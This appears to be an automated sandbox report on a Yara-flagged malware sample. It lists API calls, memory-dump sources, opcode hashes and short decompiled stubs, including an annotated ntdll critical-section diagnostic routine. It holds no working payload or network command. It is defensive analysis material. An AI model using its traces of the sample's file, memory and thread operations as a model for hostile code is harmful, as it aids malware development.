                                                                                                  • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                  • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                  • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                  				int _t10;
                                                                                                  				void* _t15;
                                                                                                  
                                                                                                  				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                  				return _t10;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                  • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00418500(intOrPtr _a4, int _a8) {
                                                                                                  				void* _t10;
                                                                                                  
                                                                                                  				_t5 = _a4;
                                                                                                  				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                  				ExitProcess(_a8);
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                  • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                  • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                                                  • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                                                                                  • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                                                  • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 68b0a6595d4862fff30e1eb2258fa6c2b78889c8aace51edcbbde5f81fe9326b
                                                                                                  • Instruction ID: 58bb0399d5248d4a32fb9bcec233960bfa248e451d90819df1530af5bb586cd1
                                                                                                  • Opcode Fuzzy Hash: 68b0a6595d4862fff30e1eb2258fa6c2b78889c8aace51edcbbde5f81fe9326b
                                                                                                  • Instruction Fuzzy Hash: DDC08C36E0D01807DA2C8C1C74903F0FFAB8377235F203393E928BB505D083C896828A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                                                  • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                                                                                                  • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                                                  • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                                                  • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
                                                                                                  • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                                                  • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                                                  • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                                                                                                  • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                                                  • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                                  • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                                                                                  • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                                  • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                                  • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                                                                                  • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                                  • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                                  • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                                                                                  • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                                  • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                                  • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                                                                                  • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                                  • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                                  • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
                                                                                                  • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                                  • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                                  • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                                                                                  • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                                  • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                                  • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                                                                                  • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                                  • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                                  • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                                                                                  • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                                  • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                                  • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                                                                                  • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                                  • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                                  • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                                                                                  • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                                  • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                                  • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                                                                                  • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                                  • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                                  • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                                                                                  • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                                  • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                                                                  • Instruction ID: c731d0ac36add5569924dd98c56324c24c60b60f050a313278903dd9629f3b26
                                                                                                  • Opcode Fuzzy Hash: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                                                                  • Instruction Fuzzy Hash: B290026260500402E250719954187060455D7D0341F51D065A002455CDC6D98A65B6E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 53%
E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
	void* _t7;
	intOrPtr _t9;
	intOrPtr _t10;
	intOrPtr* _t12;
	intOrPtr* _t13;
	intOrPtr _t14;
	intOrPtr* _t15;

	/* Decompiler output (quality 53%). The format strings and the field offsets used
	   below match ntdll's critical-section timeout diagnostics. _t12 is never assigned
	   in this listing, so it is an incoming register value: the RTL_CRITICAL_SECTION
	   pointer, given the field accesses that follow. */
	_t13 = __edx;                          /* __edx -> 64-bit timeout (LARGE_INTEGER, 100 ns units) */
	_push(_a4);
	_t14 =  *[fs:0x18];                    /* fs:[0x18] is the TEB self pointer on 32-bit Windows */
	_t15 = _t12;                           /* _t15 = RTL_CRITICAL_SECTION* */
	/* 64-bit division: timeout / 0xffffffffff676980 (-10,000,000) converts 100 ns ticks to seconds */
	_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
	_push(_t13);
	E00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);   /* debug-print routine (format string + arguments) */
	_t9 =  *_t15;                          /* RTL_CRITICAL_SECTION.DebugInfo */
	if(_t9 == 0xffffffff) {                /* -1: no debug info allocated for this section */
		_t10 = 0;
	} else {
		_t10 =  *((intOrPtr*)(_t9 + 0x14));   /* RTL_CRITICAL_SECTION_DEBUG.ContentionCount */
	}
	_push(_t10);
	_push(_t15);
	_push( *((intOrPtr*)(_t15 + 0xc)));    /* RTL_CRITICAL_SECTION.OwningThread */
	_push( *((intOrPtr*)(_t14 + 0x24)));   /* TEB.ClientId.UniqueThread */
	/* last argument: TEB.ClientId.UniqueProcess */
	return E00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
}

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
Memory Dump Source
• Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
• API String ID: 885266447-3903918235
Uniqueness
Uniqueness Score: -1.00%

Executed Functions

APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00AA3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AA3B87,007A002E,00000000,00000060,00000000,00000000), ref: 00AA81FD
Strings
Memory Dump Source
• Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtReadFile.NTDLL(00AA3D42,5E972F59,FFFFFFFF,00AA3A01,?,?,00AA3D42,?,00AA3A01,FFFFFFFF,5E972F59,00AA3D42,?,00000000), ref: 00AA82A5
Memory Dump Source
• Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA83C9
Memory Dump Source
• Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA83C9
Memory Dump Source
• Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(00AA3D20,?,?,00AA3D20,00000000,FFFFFFFF), ref: 00AA8305
Memory Dump Source
• Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
• Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp
• Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
• Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp
• Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                  • Opcode ID: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                                                                                                  • Instruction ID: 70c567ac5bbde512bb77cc7b4ab908c84606a0c14b9b004f86c4974e27d70a43
                                                                                                  • Opcode Fuzzy Hash: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                                                                                                  • Instruction Fuzzy Hash: A190026D22344412D180B15D545860A0005D7D1242FD1D425A0005598CCE5588696361
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
Uniqueness

Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A93B93), ref: 00AA84ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                  • Opcode ID: 9d70758c32acb761028c05b4992dd5f97d2dbf639e10b5c04f7e4758772eedef
                                                                                                  • Instruction ID: 89ba26806d92f70dfb8ef239d71175fa1e16619bef60f99b6107120013859b7c
                                                                                                  • Opcode Fuzzy Hash: 9d70758c32acb761028c05b4992dd5f97d2dbf639e10b5c04f7e4758772eedef
                                                                                                  • Instruction Fuzzy Hash: DFE06DB66402016FE714EF54DC49FE77B69EF88350F018599B9189B291D631E901CAB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A93B93), ref: 00AA84ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                  • Instruction ID: 59c778deacb7a0d227a43235b63255ce7017bc8757ab982acb34506581b5e6e5
                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                  • Instruction Fuzzy Hash: AFE01AB12002046BDB14DF59CC49EA777ACAF88750F018554BA0857281CA30E9108AF0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A972BA
                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A972DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                                                                  • Instruction ID: 0403cb0daf7db51ae60b3d41fbd95a9330f6ca659165d298efdd5fbcd5a7354d
                                                                                                  • Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                                                                  • Instruction Fuzzy Hash: CF018431B903287AEB20A7949D43FFF76AC5B01B50F154119FF04BA1C2E794690686F5
                                                                                                  Uniqueness

